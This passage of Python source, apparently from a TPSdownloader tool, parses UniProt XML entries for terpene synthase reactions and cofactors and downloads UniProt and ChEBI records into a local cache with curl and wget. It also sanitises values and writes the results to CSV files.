        # block, which itself produces "RuntimeError: No active exception to
        # re-raise"; raise RuntimeError explicitly (same exception type
        # callers would have seen) with a meaningful message instead.
        raise RuntimeError("%s: inconsistent annotation list lengths: %s" % (str(_primary_accession), str(_lengths)))
def process_delayed_buffers(_primary_accession, _chebi_ids_local, _rhea_ids_local, _ec_numbers_local, _reactions_local, _cofactor_ids_local, _cofactors_local, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry):
    """Flush one reaction's parsed buffers into the per-entry lists (in place).

    Called when a second '<comment type="catalytic activity">' entry starts,
    a new Uniprot entry begins, or the end of file is reached: the data
    collected for the previous reaction are appended to the *_per_entry
    lists.  Each of the six per-entry lists receives exactly one item per
    flush (a deep copy of the buffer, or [] when that buffer is empty) so
    their lengths stay in sync for check_parsed_list_lengths().

    NOTE: callers must clear the *_local buffers themselves after this call.
    The original code also rebound the *_local names to [] at the end, but
    rebinding function-local names is invisible to the caller -- those dead
    assignments were removed (the callers already reset their own buffers).
    """
    if myoptions.debug:
        print("Debug: process_delayed_buffers(): %s: Received _chebi_ids_local=%s, _rhea_ids_local=%s, _ec_numbers_local=%s, _reactions_local=%s" % (str(_primary_accession), str(_chebi_ids_local), str(_rhea_ids_local), str(_ec_numbers_local), str(_reactions_local)))
        print("Debug: process_delayed_buffers(): %s: Entered with _chebi_ids_per_entry=%s, _rhea_ids_per_entry=%s, _ec_numbers_per_entry=%s, _reactions_per_entry=%s" % (str(_primary_accession), str(_chebi_ids_per_entry), str(_rhea_ids_per_entry), str(_ec_numbers_per_entry), str(_reactions_per_entry)))
    # note: cofactor buffers alone do not trigger a flush (preserved behaviour)
    if _chebi_ids_local or _rhea_ids_local or _ec_numbers_local or _reactions_local:
        for _local, _per_entry in (
                (_chebi_ids_local, _chebi_ids_per_entry),
                (_rhea_ids_local, _rhea_ids_per_entry),
                (_ec_numbers_local, _ec_numbers_per_entry),
                (_reactions_local, _reactions_per_entry),
                (_cofactor_ids_local, _cofactor_ids_per_entry),
                (_cofactors_local, _cofactors_per_entry)):
            # deep-copy so the caller's subsequent buffer reuse cannot mutate
            # what was already stored; empty buffers become placeholders
            _per_entry.append(copy.deepcopy(_local) if _local else [])
        if myoptions.debug:
            print("Debug: process_delayed_buffers(): %s: Re-wrapped data into lists to keep their lengths same: _chebi_ids_per_entry=%s, _rhea_ids_per_entry=%s, _ec_numbers_per_entry=%s, _reactions_per_entry=%s, _cofactor_ids_per_entry=%s, _cofactors_per_entry=%s" % (str(_primary_accession), str(_chebi_ids_per_entry), str(_rhea_ids_per_entry), str(_ec_numbers_per_entry), str(_reactions_per_entry), str(_cofactor_ids_per_entry), str(_cofactors_per_entry)))
    if myoptions.debug:
        print("Debug: process_delayed_buffers(): %s: Leaving with _chebi_ids_per_entry=%s, _rhea_ids_per_entry=%s, _ec_numbers_per_entry=%s, _reactions_per_entry=%s, _cofactor_ids_per_entry=%s, _cofactors_per_entry=%s" % (str(_primary_accession), str(_chebi_ids_per_entry), str(_rhea_ids_per_entry), str(_ec_numbers_per_entry), str(_reactions_per_entry), str(_cofactor_ids_per_entry), str(_cofactors_per_entry)))
def parse_uniprot_xml(filename, uniprot_pri_acc2aliases, uniprot_aliases2pri_acc, already_parsed):
"""Parse a single XML stream (a file pre-fetched into a local cache) from Uniprot.
<?xml version="1.0" encoding="UTF-8"?>
<uniprot xmlns="http://uniprot.org/uniprot" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://uniprot.org/uniprot http://www.uniprot.org/support/docs/uniprot.xsd">
<entry created="2018-11-07" dataset="Swiss-Prot" modified="2019-12-11" version="30">
<accession>G0LES5</accession>
<name>TRI5_TRIAR</name>
...
</entry>
<copyright>
Copyrighted by the UniProt Consortium, see https://www.uniprot.org/terms
Distributed under the Creative Commons Attribution (CC BY 4.0) License
</copyright>
</uniprot>
"""
# A0A348B779 - data for the last reaction were not parsed out, so the product CHEBI:140564 got lost
# A0A5Q0QRJ3
# Q50L36
if not os.path.exists(filename):
raise ValueError("File %s does not exist." % str(filename))
else:
if filename.endswith('xml.gz'):
_file = gzip.open(filename)
else:
_file = open(filename)
print("Info: Opened %s for parsing" % filename)
etree = ET.iterparse(_file, events=('start', 'end'))
# try:
# etree=ET.parse(filename)
# except ET.ParseError:
# raise ET.ParseError("Maybe the file %s is not in XML format?" % str(filename))
# root=etree.getroot() # AttributeError: 'IterParseIterator' object has no attribute 'getroot'
_primary_accession = None
_secondary_accessions = []
_uniprot_name = None
_recommended_name = None # sometimes UniProt has unset protein_names and also feature_description
_alternative_names = []
_submitted_name = None
_feature_descriptions = []
_sequence = None
_organism = None
_lineage = []
# data buffers to be processed in a delayed way
_chebi_ids_local = []
_rhea_ids_local = []
_ec_numbers_local = []
_reactions_local = []
_cofactor_ids_local = []
_cofactors_local = []
_item_counter = 0
# for elem in root:
for event, elem in etree:
if myoptions.debug:
print("Debug: event=%s, elem=%s" % (str(event), str(elem)))
print("Level 0: ", event, elem.tag, ' ', elem.attrib, ' ', elem.text)
if elem.tag == '{http://uniprot.org/uniprot}entry':
if event == 'start' and _primary_accession and _primary_accession not in already_parsed:
if myoptions.debug > 1: print("Debug: %s: Reached start tag of a new entry section: %s in %s, returning results parsed so far for %s" % (_primary_accession, filename, str(elem.items()), str(_primary_accession)))
# process previously parsed data buffers
process_delayed_buffers(_primary_accession, _chebi_ids_local, _rhea_ids_local, _ec_numbers_local, _reactions_local, _cofactor_ids_local, _cofactors_local, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry)
if myoptions.verbose or myoptions.debug:
print("Info: %s: Yielding a single entry %d from file %s" % (_primary_accession, _item_counter, str(filename)))
for _var, _varname in zip([_primary_accession, _secondary_accessions, _uniprot_name, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry, _sequence, _organism, _lineage], ['_primary_accession', '_secondary_accessions', '_uniprot_name', '_recommended_name', '_alternative_names', '_submitted_name', '_feature_descriptions', '_chebi_ids_per_entry', '_rhea_ids_per_entry', '_ec_numbers_per_entry', '_reactions_per_entry', '_cofactor_ids_per_entry', '_cofactors_per_entry', '_sequence', '_organism', '_lineage']):
print("Info: %s: %s=%s" % (_primary_accession, _varname, _var))
if not _recommended_name and not _alternative_names and not _submitted_name:
# <uniprot xmlns="http://uniprot.org/uniprot" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://uniprot.org/uniprot http://www.uniprot.org/support/docs/uniprot.xsd">
# <entry created="2011-10-19" dataset="TrEMBL" modified="2021-04-07" version="68">
# <accession>G1JUH4</accession>
# <name>G1JUH4_SOLLC</name>
# <protein>
# <submittedName>
# <fullName evidence="4 5">Beta myrcene/limonene synthase</fullName>
# </submittedName>
raise ValueError("No protein descriptions were parsed for _primary_accession=%s, _secondary_accessions=%s from %s" % (str(_primary_accession), str(_secondary_accessions), filename))
check_parsed_list_lengths(_primary_accession, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry)
yield(_primary_accession, _secondary_accessions, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _organism, _lineage, _sequence)
# clear the values after pushing them out as results
_chebi_ids_local = []
_rhea_ids_local = []
_ec_numbers_local = []
_reactions_local = []
_cofactor_ids_local = []
_cofactors_local = []
_chebi_ids_per_entry = []
_rhea_ids_per_entry = []
_ec_numbers_per_entry = []
_reactions_per_entry = []
_cofactor_ids_per_entry = []
_cofactors_per_entry = []
_primary_accession = None
_secondary_accessions = []
_uniprot_name = None
_recommended_name = None # sometimes UniProt has unset protein_names and also feature_description
_alternative_names = []
_submitted_name = None
_feature_descriptions = []
_chebi_ids_local = []
_rhea_ids_local = []
_ec_numbers_local = []
_reactions_local = []
_cofactor_ids_local = []
_cofactors_local = []
_chebi_ids_per_entry = []
_rhea_ids_per_entry = []
_ec_numbers_per_entry = []
_reactions_per_entry = []
_cofactor_ids_per_entry = []
_cofactors_per_entry = []
_sequence = None
_organism = None
_lineage = []
elif event == 'end' and elem.tag == '{http://uniprot.org/uniprot}copyright' and _primary_accession and _primary_accession and _primary_accession not in already_parsed:
# process previously parsed data buffers
process_delayed_buffers(_primary_accession, _chebi_ids_local, _rhea_ids_local, _ec_numbers_local, _reactions_local, _cofactor_ids_local, _cofactors_local, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry)
if myoptions.debug > 1: print("Debug: %s: Reached items %s in %s, returning results parsed so far" % (_primary_accession, str(elem.items()), filename))
if not _recommended_name and not _alternative_names and not _submitted_name:
# <uniprot xmlns="http://uniprot.org/uniprot" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://uniprot.org/uniprot http://www.uniprot.org/support/docs/uniprot.xsd">
# <entry created="2011-10-19" dataset="TrEMBL" modified="2021-04-07" version="68">
# <accession>G1JUH4</accession>
# <name>G1JUH4_SOLLC</name>
# <protein>
# <submittedName>
# <fullName evidence="4 5">Beta myrcene/limonene synthase</fullName>
# </submittedName>
raise ValueError("No proteins descriptions were parsed for _accessions=%s, _secondary_accessions=%s" % (str(_primary_accession), str(_secondary_accessions)))
else:
if myoptions.debug: print("Info: Yielding the very last entry %s from file %s" % (str(_primary_accession), str(filename)))
if myoptions.debug:
for _var, _varname in zip([_primary_accession, _secondary_accessions, _uniprot_name, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry, _sequence, _organism, _lineage], ['_primary_accession', '_secondary_accessions', '_uniprot_name', '_recommended_name', '_alternative_names', '_submitted_name', '_feature_descriptions', '_chebi_ids_per_entry', '_rhea_ids_per_entry', '_ec_numbers_per_entry', '_reactions_per_entry', '_cofactor_ids_per_entry', '_cofactors_per_entry', '_sequence', '_organism', '_lineage']):
print("Info: %s: %s=%s" % (_primary_accession, _varname, _var))
check_parsed_list_lengths(_primary_accession, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry)
yield(_primary_accession, _secondary_accessions, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry, _recommended_name, _alternative_names, _submitted_name, _feature_descriptions, _organism, _lineage, _sequence)
# clear the values after pushing them out as results
_chebi_ids_local = []
_rhea_ids_local = []
_ec_numbers_local = []
_reactions_local = []
_cofactor_ids_local = []
_cofactors_local = []
_chebi_ids_per_entry = []
_rhea_ids_per_entry = []
_ec_numbers_per_entry = []
_reactions_per_entry = []
_cofactor_ids_per_entry = []
_cofactors_per_entry = []
for child in elem:
if myoptions.debug > 1: print("Child items: ", str(child.items()))
if myoptions.debug > 1: print("Level 1:", event, 'tag:', child.tag, 'attrib:', child.attrib, 'text:', child.text)
if event == 'end' and child.tag == '{http://uniprot.org/uniprot}accession' and child.text and child.text not in already_parsed: # do not parse duplicate entries again, e.g. E9E766
if myoptions.debug > 1: print("Info: Came across accession %s" % child.text)
if myoptions.debug > 1: print("L1: child.attrib: ", child.attrib, "child.tag: ", child.tag)
if not _primary_accession:
_primary_accession = child.text # "Q6XDB5"
else:
_secondary_accessions.append(child.text) # "C0PT91"
uniprot_aliases2pri_acc[child.text] = _primary_accession # point to the primary
if _primary_accession not in uniprot_pri_acc2aliases.keys():
uniprot_pri_acc2aliases[_primary_accession] = [child.text]
else:
uniprot_pri_acc2aliases[_primary_accession].extend([child.text])
elif event == 'end' and child.tag == '{http://uniprot.org/uniprot}name':
_uniprot_name = child.text # "TPSD2_PICSI"
elif event == 'end' and child.tag == '{http://uniprot.org/uniprot}sequence':
_sequence = child.text
if event == 'end' and child.tag == '{http://uniprot.org/uniprot}feature':
if 'type' in child.attrib.keys() and 'description' in child.attrib.keys() and child.attrib['type'] == 'chain':
_feature_descriptions.extend([child.attrib['description']]) # A0A2N8PG38, A0A239C551
if _primary_accession:
for subchild in child:
if myoptions.debug > 1: print("Level 2: ", event, subchild.tag, ' ', subchild.attrib, ' ', subchild.text)
if event == 'end' and child.tag == '{http://uniprot.org/uniprot}organism':
if subchild.tag == '{http://uniprot.org/uniprot}name' and subchild.attrib['type'] == 'scientific':
_organism = subchild.text
for sschild in subchild:
tag = {}
if myoptions.debug > 1: print("Level 3: ", event, sschild.tag, ' ', sschild.attrib, ' ', sschild.text)
if event == 'end' and subchild.tag == '{http://uniprot.org/uniprot}recommendedName':
if sschild.tag == '{http://uniprot.org/uniprot}fullName':
_recommended_name = sschild.text
elif event == 'end' and subchild.tag == '{http://uniprot.org/uniprot}alternativeName':
if sschild.tag == '{http://uniprot.org/uniprot}fullName':
if not _alternative_names:
_alternative_names = [sschild.text]
else:
_alternative_names.extend([sschild.text]) # A0A2N0DJE2
elif event == 'end' and child.tag == '{http://uniprot.org/uniprot}protein':
if subchild.tag == '{http://uniprot.org/uniprot}submittedName':
if sschild.tag == '{http://uniprot.org/uniprot}fullName':
_submitted_name = sschild.text # G1JUH4
elif event == 'end' and child.tag == '{http://uniprot.org/uniprot}comment' and 'type' in child.attrib.keys() and child.attrib['type'] == 'catalytic activity' and subchild.tag == '{http://uniprot.org/uniprot}reaction':
# https://www.uniprot.org/uniprot/A0A348B779.xml
# <comment type="catalytic activity">
# <reaction evidence="3">
# <text>
# (2E,6E)-farnesyl diphosphate = diphosphate + gamma-muurolene
# </text>
# <dbReference type="Rhea" id="RHEA:33107"/>
# <dbReference type="ChEBI" id="CHEBI:33019"/>
# <dbReference type="ChEBI" id="CHEBI:64798"/>
# <dbReference type="ChEBI" id="CHEBI:175763"/>
# <dbReference type="EC" id="4.2.3.126"/>
# </reaction>
# <physiologicalReaction direction="left-to-right" evidence="3">
# <dbReference type="Rhea" id="RHEA:33108"/>
# </physiologicalReaction>
# </comment>
if event == 'end' and sschild.tag == '{http://uniprot.org/uniprot}dbReference':
if sschild.attrib['type'] == 'ChEBI':
# do not even fetch unwanted ChEBI Ids
# if sschild.attrib['id'] not in non_terpene_and_acyclic_terpene_chebi_ids:
if sschild.attrib['id'] not in _chebi_ids_local:
_chebi_ids_local.append(sschild.attrib['id'])
elif sschild.attrib['type'] == 'Rhea':
# Reaction direction could be undefined, left-to-right, right-to-left, bidirectional
# So probably 4 Rhea IDs exist per every EC number (reaction)
_rhea_ids_local.append(sschild.attrib['id'])
elif sschild.attrib['type'] == 'EC':
# seems only a single EC number exists per reaction
_ec_numbers_local.append(sschild.attrib['id'])
elif event == 'end' and sschild.tag == '{http://uniprot.org/uniprot}text':
_reactions_local.append(sschild.text)
else:
raise ValueError("Unexpected tag in Uniprot XML stream sschild.tag=%s" % str(sschild.tag))
# when leaving "</reaction>" check if we lengths of lists are same if not, fill the missing ones
elif event == 'end' and child.tag == '{http://uniprot.org/uniprot}comment' and 'type' in child.attrib.keys() and child.attrib['type'] == 'cofactor' and subchild.tag == '{http://uniprot.org/uniprot}cofactor':
# A3KI17
if event == 'end' and sschild.tag == '{http://uniprot.org/uniprot}dbReference':
if sschild.attrib['type'] == 'ChEBI':
_cofactor_ids_local.append(sschild.attrib['id'])
if event == 'end' and sschild.tag == '{http://uniprot.org/uniprot}name':
_cofactors_local.append(sschild.text)
# Level 1: {http://uniprot.org/uniprot}comment {'type': 'catalytic activity'}
# Level 2: {http://uniprot.org/uniprot}reaction {'evidence': '3'}
# Level 3: {http://uniprot.org/uniprot}text {} (2E)-geranyl diphosphate = (1S,5S)-alpha-pinene + diphosphate
# Level 3: {http://uniprot.org/uniprot}dbReference {'id': 'RHEA:25488', 'type': 'Rhea'} None
# Level 3: {http://uniprot.org/uniprot}dbReference {'id': 'CHEBI:28660', 'type': 'ChEBI'} None
# Level 3: {http://uniprot.org/uniprot}dbReference {'id': 'CHEBI:33019', 'type': 'ChEBI'} None
# Level 3: {http://uniprot.org/uniprot}dbReference {'id': 'CHEBI:58057', 'type': 'ChEBI'} None
# Level 3: {http://uniprot.org/uniprot}dbReference {'id': '4.2.3.119', 'type': 'EC'} None
if event == 'end' and child.tag == '{http://uniprot.org/uniprot}organism':
if subchild.tag == '{http://uniprot.org/uniprot}lineage':
if sschild.tag == '{http://uniprot.org/uniprot}taxon':
_lineage += [sschild.text]
# if event == 'end' and subchild.tag == '{http://uniprot.org/uniprot}reaction':
# # this pushes te caches too early before the cofactor annotation is parsed
# # when hitting a second '<comment type="catalytic activity">' entry or end of file or a new Uniprot entry item, process the previously collected data
# if myoptions.debug:
# print("Debug: %s: Pushing out the buffer contents after reaching end of reaction tag event=%s, child=%s, subchild=%s" % (_primary_accession, event, str(child), str(subchild)))
# process_delayed_buffers(_primary_accession, _chebi_ids_local, _rhea_ids_local, _ec_numbers_local, _reactions_local, _cofactor_ids_local, _cofactors_local, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry)
#
# # make sure to empty the buffer for another reaction tag branch
# _chebi_ids_local = []
# _rhea_ids_local = []
# _ec_numbers_local = []
# _reactions_local = []
# _cofactor_ids_local = []
# _cofactors_local = []
if _primary_accession and not _recommended_name and not _alternative_names and not _submitted_name:
# <uniprot xmlns="http://uniprot.org/uniprot" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://uniprot.org/uniprot http://www.uniprot.org/support/docs/uniprot.xsd">
# <entry created="2011-10-19" dataset="TrEMBL" modified="2021-04-07" version="68">
# <accession>G1JUH4</accession>
# <name>G1JUH4_SOLLC</name>
# <protein>
# <submittedName>
# <fullName evidence="4 5">Beta myrcene/limonene synthase</fullName>
# </submittedName>
raise ValueError("No protein descriptions were parsed for _primary_accession=%s which is %d-th entry from %s" % (str(_primary_accession), _item_counter, filename))
_item_counter += 1
def create_cache(cachedir=".TPSdownloader_cache"):
    """Make the local caching directory tree for downloaded XML files.

    Creates `cachedir` plus its 'uniprot' and 'chebi' subdirectories.
    Idempotent: pre-existing directories are left untouched.

    cachedir -- cache root directory path (created if missing)
    """
    # os.makedirs(..., exist_ok=True) avoids the exists()/mkdir() race of the
    # original check-then-create sequence and creates parents when needed.
    os.makedirs(cachedir, exist_ok=True)
    for subdir in ('uniprot', 'chebi'):
        os.makedirs(cachedir + os.path.sep + subdir, exist_ok=True)
def downloader(cmdline):
    """Execute an external download command and rate-limit subsequent calls.

    Prints the command, runs it without a shell, reports any stderr
    output, flushes both standard streams and always sleeps 30 seconds
    afterwards so the remote servers are not hammered.

    cmdline -- full command line as a single string (split via shlex)
    """
    print("Info:", cmdline)
    _argv = shlex_split(cmdline)
    _process = Popen(_argv, shell=False, stdout=PIPE, stderr=PIPE)
    _stdout, _stderr = _process.communicate()
    if _stderr and _stderr[0]:
        sys.stderr.write("Error: '%s' gave '%s'\n" % (cmdline, str(_stderr)))
    sys.stdout.flush()
    sys.stderr.flush()
    # unconditional delay between downloads (crude rate limiting)
    time.sleep(30)
def downloader_wrapper(myid, dbname, cachedir, url):
    """Fetch one XML record into the local cache, trying curl and then wget.

    myid     -- accession/ID to fetch; appended to `url` ('.xml' suffix is
                added for the uniprot database)
    dbname   -- cache subdirectory name, 'uniprot' or 'chebi'
    cachedir -- cache root directory, with or without trailing separator
    url      -- base URL the ID gets appended to

    curl cannot fetch https://www.uniprot.org/uniprot/Q5Gj59.xml
    but wget can as it accepts redirect to the primary entry. But we
    do not want to store the primary entry under the filename of the
    secondary at least. Let's hope we get to the primary entry ID via
    another path.
    Note, there was a typo in Q5Gj59 with lower-case 'j' in there.
    """
    # normalize the cache path so it always ends with "<dbname>/"
    if cachedir[-1] != os.path.sep:
        _cachedir = cachedir + os.path.sep + dbname + os.path.sep
    else:
        _cachedir = cachedir + dbname + os.path.sep
    if dbname == 'uniprot' and url[-1] != '/':
        url += '/'
    if os.path.exists(_cachedir):
        _filename = _cachedir + myid + ".xml"
        # a zero-byte file is a failed download from a previous run: retry it
        if os.path.exists(_filename) and not os.path.getsize(_filename):
            os.remove(_filename)
        if not os.path.exists(_filename):
            #print("Debug: fetching %s from uniprot" % myid)
            # older curl version do not support --no-progress-meter
            _cmdline = "curl --silent --show-error -o " + _filename + " " + url + myid
            if dbname == 'uniprot':
                _cmdline += ".xml"
            downloader(_cmdline)
            # curl does not follow redirects if we asked for a secondary/alias accession
            # --2021-05-12 22:49:30--  https://www.uniprot.org/uniprot/D8R8K9.xml
            # Redirected to: /uniprot/G9MAN7.xml [following]
            # --2021-05-12 22:49:30--  https://www.uniprot.org/uniprot/G9MAN7.xml
            # fall back to wget (follows the redirect) when curl produced an empty file
            if os.path.exists(_filename) and not os.path.getsize(_filename):
                sys.stderr.write("Error: Failed to download XML data using '%s' command, re-trying with wget\n" % _cmdline)
                os.remove(_filename)
                _cmdline = "wget --no-proxy --directory-prefix=" + _cachedir + " --max-redirect=1 -o " + _filename + ".log " + url + myid
                if dbname == 'uniprot':
                    _cmdline += ".xml"
                downloader(_cmdline)
                # could also prettyprint the XML files using
                # xml_pp -i.bak _filename
        else:
            if myoptions.debug:
                sys.stderr.write("Debug: File %s already exists\n" % _filename)
    else:
        sys.stderr.write("Error: Directory %s does not exist\n" % _cachedir)
def download_uniprot(myid, path=".TPSdownloader_cache" + os.path.sep + 'uniprot' + os.path.sep):
    """Fetch the UniProt XML record for `myid` into the local cache.

    Downloads a page like https://www.uniprot.org/uniprot/A0A2K9RFZ2.xml
    via downloader_wrapper() (which is a no-op when the file is already
    cached) and returns the cache-relative path of the XML file.

    UniProt entries may carry several <accession> values (e.g. TPS26_MAIZE
    lists A0A1D6LTV0, A5YZT5, B4F964, C0PNL6) plus recommendedName and
    multiple alternativeName blocks; only the requested ID is used for
    the cache filename here.

    NOTE(review): the `path` parameter is accepted but never used; the
    location is re-derived from the hard-coded cache root below.
    """
    _cache_root = ".TPSdownloader_cache" + os.path.sep
    downloader_wrapper(myid, 'uniprot', _cache_root, "https://www.uniprot.org/uniprot/")
    return _cache_root + 'uniprot' + os.path.sep + myid + '.xml'
def download_chebi(myid, path=".TPSdownloader_cache" + os.path.sep + 'chebi' + os.path.sep):
    """Fetch ChEBI entity XML record(s) into the local cache.

    Downloads a page like
    https://www.ebi.ac.uk/chebi/saveStructure.do?xml=true&chebiId=58622
    for a single ID or for every unique, non-empty ID in a list.
    ChEBI also provides SQL dumps, probably an overkill for our purpose.

    myid -- one ChEBI ID string, or a list of them; falsy values skipped
    """
    _base_url = "https://www.ebi.ac.uk/chebi/saveStructure.do?xml=true&chebiId="
    _cache_root = ".TPSdownloader_cache" + os.path.sep
    if isinstance(myid, list):
        # de-duplicate before hitting the network
        for _single_id in set(myid):
            if _single_id:
                downloader_wrapper(_single_id, 'chebi', _cache_root, _base_url)
    elif myid:
        downloader_wrapper(myid, 'chebi', _cache_root, _base_url)
def process_chebi(chebi_id, chebi_dict_of_lists):
    """Download and parse one ChEBI entry, appending its fields to the store.

    chebi_id            -- ChEBI accession, also the cache filename stem
    chebi_dict_of_lists -- column-name -> list-of-values store, updated in
                           place (only when the ID is not present yet)

    Returns the classified terpene type, or None when no formula was parsed
    or outside the 'terpene_synthases' run mode.
    """
    download_chebi(chebi_id)
    _filename = ".TPSdownloader_cache" + os.path.sep + 'chebi' + os.path.sep + chebi_id + '.xml'
    if os.path.exists(_filename) and os.path.getsize(_filename):
        try:
            _chebi_id2, _names, _definition, _formula, _smiles = parse_chebi_xml(_filename)
        except RuntimeError as e:
            # NOTE(review): when this condition is False the five variables above
            # remain unbound and the code below raises NameError -- confirm intended.
            if not os.path.exists(_filename) and os.path.exists(_filename + ".bad"):
                # NOTE(review): str(e.with_traceback) renders the bound-method repr,
                # not an actual traceback
                sys.stderr.write("Warning: Failed to parse file %s , will re-fetch after 600 sec delay. Error was: %s\n" % (str(_filename), str(e.with_traceback)))
                time.sleep(600)
                _chebi_id2, _names, _definition, _formula, _smiles = parse_chebi_xml(_filename)
        if _formula and myoptions.run_mode == 'terpene_synthases':
            _terpene_type = classify_terpene(_formula[0]) # TODO: adjust to the inefficient hack and get rid of the unnecessary list wrapping the single value
        else:
            _terpene_type = None
    else:
        # no usable cache file: nothing was parsed
        # NOTE(review): _smiles/_chebi_id2 are unbound on this path; the code
        # below would raise NameError -- confirm this branch cannot be hit there
        _terpene_type = None
    if _smiles and myoptions.run_mode == 'terpene_synthases':
        try:
            # make sure rdkit was imported at all
            _cyclic = is_cyclic(_smiles)
        except ImportError:
            _cyclic = None
    else:
        _cyclic = None
    # only append when this ChEBI ID was not recorded before (keep columns aligned)
    if _chebi_id2 and _chebi_id2 not in chebi_dict_of_lists['ChEBI ID']:
        chebi_dict_of_lists['ChEBI ID'].append(_chebi_id2)
        chebi_dict_of_lists['Compound name'].append(_names)
        chebi_dict_of_lists['Compound description'].append(_definition)
        chebi_dict_of_lists['Formula'].append(_formula)
        chebi_dict_of_lists['SMILES'].append(_smiles)
        if _terpene_type:
            chebi_dict_of_lists['Type (mono, sesq, di, …)'].append(_terpene_type)
        else:
            chebi_dict_of_lists['Type (mono, sesq, di, …)'].append('')
        if _cyclic:
            chebi_dict_of_lists['cyclic/acyclic'].append('cyclic')
        else:
            chebi_dict_of_lists['cyclic/acyclic'].append('')
    if myoptions.debug: print("Debug: %s: process_chebi(): _terpene_type=%s" % (chebi_id, str(_terpene_type)))
    return _terpene_type
def print_df(df):
    """Dump every column of the dataframe as a 'label:'/'content:' pair.

    Typical labels are 'Uniprot ID' and 'Name'.
    """
    for _column_name, _column_values in df.items():
        print(f'label: {_column_name}')
        print(f'content: {_column_values}')
def write_csv_and_xls(df, suffix='', datetime=None):
    """Write CSV output, per one Uniprot ID A0A2K9RFZ2 output even
    multiple lines if there are multiple reactions catalyzed
    https://www.uniprot.org/uniprot/A0A2K9RFZ2
    https://www.ebi.ac.uk/chebi/searchId.do?chebiId=CHEBI:58622

    df       -- pandas DataFrame to serialize
    suffix   -- optional tag inserted into the output filename
    datetime -- pre-formatted timestamp string; when falsy the current
                local time is used
    """
    # BUG FIX: the `datetime` parameter shadows the stdlib `datetime` module,
    # so the original `datetime.datetime.now()` raised AttributeError whenever
    # the default None was passed; import the module under an alias instead.
    import datetime as _datetime_module
    if not datetime:
        _datetime = _datetime_module.datetime.now().strftime("%Y%m%d%H%M%S")
    else:
        _datetime = datetime
    df.to_csv("TPSdownloader_" + suffix + _datetime + ".csv", index=False)
    # df.to_excel("TPSdownloader_" + _datetime + ".xls", sheet_name="Sheet1", index=False)
    print("Info: Wrote TPSdownloader_" + suffix + _datetime + ".csv file.")
def sanitize_input_text_values(i):
    """Convert string representation of pythonic values into real python datatypes.

    Returns '' for empty/NaN-like inputs, True for a truthy bool, a list of
    strings for non-empty string input (splitting '[...]' text via
    parse_list_or_set()), and otherwise the normalized value. The branch
    order below is deliberate and order-sensitive.
    """
    # first pass: collapse np.NaN/None to '' before the main branch ladder
    if i is np.NaN:
        _i = ''
    elif i is None:
        _i = ''
    else:
        _i = i
    if _i is np.NaN:
        _i = ''
    elif _i is None:
        return ''
    elif _i == 'nan':
        return ''
    elif str(_i) == 'nan':
        # catches float('nan') and similar whose str() is 'nan'
        return ''
    elif i and isinstance(i, bool):
        return True
    elif not i and isinstance(i, bool):
        # False is mapped to '' rather than kept as a bool
        return ''
    elif i and isinstance(i, str):
        # normalize whitespace, then split pythonic '[...]' list text
        _i = i.strip().replace('\n','').replace('\t',' ').replace('  ',' ')
        if _i.startswith('[') and _i.endswith(']'):
            _i = parse_list_or_set(_i) # split the list text representation into entries
        else:
            _i = [_i]
    elif _i and isinstance(i, float):
        # numeric cells from pandas arrive as floats; truncate to int
        _i = int(_i)
    if not _i:
        return ''
    else:
        return _i
def parse_storage(filename):
    """Parse the manually curated XLS(X) table with terpene synthases into memory, into
    pythonic lists and sets. We copy whole columns in a single sweep but have to revisit
    some entries one-by-one (fix 'Amino acid sequence' described further below).
    The original idea to parse manually curated table into memory and add to the table
    only new rows is currently not feasible. The columns have different naming and
    the manually curated tables contains several groups of rows for substrate, product
    and cofactors, all of the should be basically in separate ChEBI table rows. Also
    same Uniprot ID appears may appear on multiple rows and we record only its very
    first instance - the dictionary used to keep track of the Uniprot ID allows only
    one Uniprot ID as a key. Lots would have to be rewamped.
    Undoing this JOIN is not as simple as I thought.
    We parse out of the table just some unchanged columns, like 'Uniprot ID' and
    'Product ChEBI ID' which is incidentally still under a column named 'ChEBI ID'.
    The substrate-related ChEBI ID is under a column 'Substrate ChEBI ID' so it does
    not mess up with the product IDs.
    Prevent typo errors and upper-case all letters in Uniprot ID.
    The ChEBI IDs are stored just as an integer to be prefixed by 'CHEBI:'. While parsing
    the XLSX storage we have to prepend the 'CHEBI:' string in from of the float()
    value returned by Pandas.
    Another issue is that 'Amino acid sequence' values are due to copy&paste trickery
    sometimes split over multiple lines with newlines and spaces and are a list of strings
    instead of just a single string. We have to sanitize that as well.
